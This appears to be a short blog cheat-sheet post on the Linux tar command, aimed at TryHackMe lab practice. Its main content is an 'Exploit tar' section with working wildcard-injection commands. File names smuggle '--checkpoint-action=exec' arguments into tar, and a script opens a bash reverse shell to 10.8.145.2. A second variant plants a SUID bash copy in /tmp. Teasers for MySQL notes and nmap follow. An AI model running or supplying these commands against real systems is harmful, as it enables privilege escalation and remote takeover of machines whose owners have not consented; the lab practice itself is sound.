Skip to main content

Linux command: tar

tar (Tape ARchive) - an archiving utility

Compress

Uncompress (extract)

Exploit tar

touch -- --checkpoint=1
touch -- "--checkpoint-action=exec=sh shell.sh"
echo -e "bash -c 'exec bash -i &>/dev/tcp/10.8.145.2/1234 <&1'" > shell.sh

Yet another version

touch -- --checkpoint=1
touch -- --checkpoint-action=exec=sh\ runme.sh
echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > runme.sh

Practice

>>> THM | Cyborg

>>> THM | VulnNet

>>> THM | Gila CMesS

>>> THM | Linux PrivEsc Arena - Task 17 - Cron (Wildcards)

Labels:

Popular posts from this blog

MySQL: Notes

Ways to check MySQL version mysql --version mysql -V dpkg -l 'mysql-sever' mysql -u root -p How to check MySQL version: mysql --version Database folder On Microsoft Windows, by default, MySQL save databases in this folder: %ProgramData%\MySQL\MySQL Server 5.5\data Check databases' size SELECT table_schema AS "Database name", SUM(data_length + index_length) / 1024 / 1024 AS "Size (MB)" FROM information_schema.TABLES GROUP BY table_schema; Export database schema $ mysqldump -u root -p --no-data wordpress1001 > c:\backup\schema-wordpress1001.sql Enter password: **************** Create a dedicated user to backup databases Give credit to: http://www.fromdual.com/privileges-of-mysql-backup-user-for-mysqldump Create dedicated mysql user and grant privileges to run backup $ mysql -u root -p CREATE USER 'backupdb'@'localhost' IDENTIFIED BY 'passwordhere'; GRANT SELECT,SHOW VIEW,RELOAD,REPLICATION CLIENT...
Read more

nmap - The Network Mapper

WARNING : It is ILLEGAL to scan hosts without permission.
Read more